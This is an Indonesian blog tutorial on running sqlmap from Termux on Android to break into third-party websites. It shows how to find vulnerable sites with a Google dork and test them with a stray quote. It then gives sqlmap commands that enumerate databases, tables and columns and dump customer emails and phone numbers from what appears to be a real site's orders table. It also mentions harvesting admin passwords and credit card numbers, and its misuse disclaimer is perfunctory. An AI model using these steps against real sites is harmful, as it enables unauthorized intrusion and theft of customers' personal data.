Tutorial Sqlmap di Android

November 10, 2018 , ,
Jakarta - Dunia teknologi jaman sekarang semakin hari semakin maju, dengan majunya teknologi jaman sekarang patutnya kita harus bisa menyaring apa saja yang akan masuk dipembelajaran kita. Salah satunya ini, lantak langkah ini tentunya hanya orang yang sudah tau mengenai SQLMAP. 

Ya paket ini banyak digunakan di dunia hacking dan underground, pada dasarnya paket ini terintegrasi dengan Linux. Namun dengan perkembangan Android sekarang paket Sqlmap ini dapat dipasang di smartphone kita tanpa akses rooted. 
Cukup menggunakan aplikasi pihak ketiga saja sudah bisa melakukan aktifitas di Sqlmap yang notabene dilakukan di komputer.

Ok langsung saja berikut cara caranya. Namun sebelum melakukan kegiatan ini dimohon jangan disalah gunakan. Saya membuat tutorial ini semata mata hanya ingin membagikan wawasan yang saya miliki. Let's go

Pertama saya akan cari target dengan dara pengguna dork di Google. Dork yang saya gunakan kali ini adalah ini "products.php?id=1" untuk fariasi dork bisa kalian kembangkan sendiri atau lihat kumpulan dork disini.

Setelah kita menemukan target yang bisa untuk diinjec maka sekarang menuju langkah eksekusi. Saya telah mendapat satu contoh website yang bisa diinject.

Target
contoh/products.php?id=1

Untuk ciri ciri jika website bisa dieksekusi ialah memiliki bug SQL inject, jika ingin mengetesnya tinggal kita tambahkan tanda ' di belakang angka. Jika muncul tulisan "You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line" maka vuln buat di inject.


Ok buka aplikasi termux diandroid kalian yang sebelum nya sudah di install paket  sqlmap. Jika kalian belum memasang paket Sqlmap di termux kalian bisa lihat di postingan saya sebelumnya.



Masuk ke folder Sqlmap dengan cara 

cd sqlmap kemudian enter
Setelah itu ketikan perintah sebagai berikut.

python2 sqlmap.py -u contoh/products.php?id=1 --dbs

Tunggu sampai kita menemukan database yang ada di website tersebut.



Setelah itu kita akan menemukan 2 atau lebih data base yang ada di website tersebut tinggal kita mencari tabel di database tersebut dengan perintah sebagai berikut, berhubung database yang saya temukan adalah "kvmco_site" maka kita cari tabel nya
python2 sqlmap.py -u contoh/products.php?id=1 -D kvmco_site --tables

Tunggu proses selesai maka akan nampak tabel di database "kvmco_site"
Database: kvmco_site
[10 tables]
+--------------+
| article      |
| blog         |
| category     |
| enquiries    |
| gallery      |
| news         |
| orders       |
| pages        |
| products     |
| testimonials |
+--------------+




sekarang kita cari colom yang ada di suatu tabel orders dengan cara ketikan perintah
python2 sqlmap.py -u contoh/products.php?id=1 -D kvmco_site -T orders --columns kemudian enter.
Maka akan muncul culomns di tabel orders
Table: orders
[10 columns]
+----------------+-----------+
| Column         | Type      |
+----------------+-----------+
| capacity       | text      |
| customer_email | text      |
| customer_name  | text      |
| customer_phone | text      |
| extra_info     | text      |
| id             | int(11)   |
| order_time     | timestamp |
| product_name   | text      |
| vehicle_make   | text      |
| vehicle_model  | text      |
+----------------+-----------+




Langkah terakhir adalah mengunduh database yang kita inginkan dengan cara
python2 sqlmap.py -u contoh/products.php?id=1 -D kvmco_site -T orders -C customer_email,customer_phone -- dump
Maka akan mengunduh email dan phone


Demikian cara penggunaan Sqlmap di android, ingat cara ini sangat tidak disarankan untuk suatu kejahatan. Pada dasarnya cara ini dipakai untuk mencari user admin dan password admin. 

Ada juga orang yang menggunakan cara ini untuk mencari data penting suatu orang yaitu number credit card. 
Jadi jangan menyalakan gunakan paket ini untuk kejahatan semata.


Salam Anjeli48

Post a Comment

No comments

Subscribe to: Post Comments ( Atom )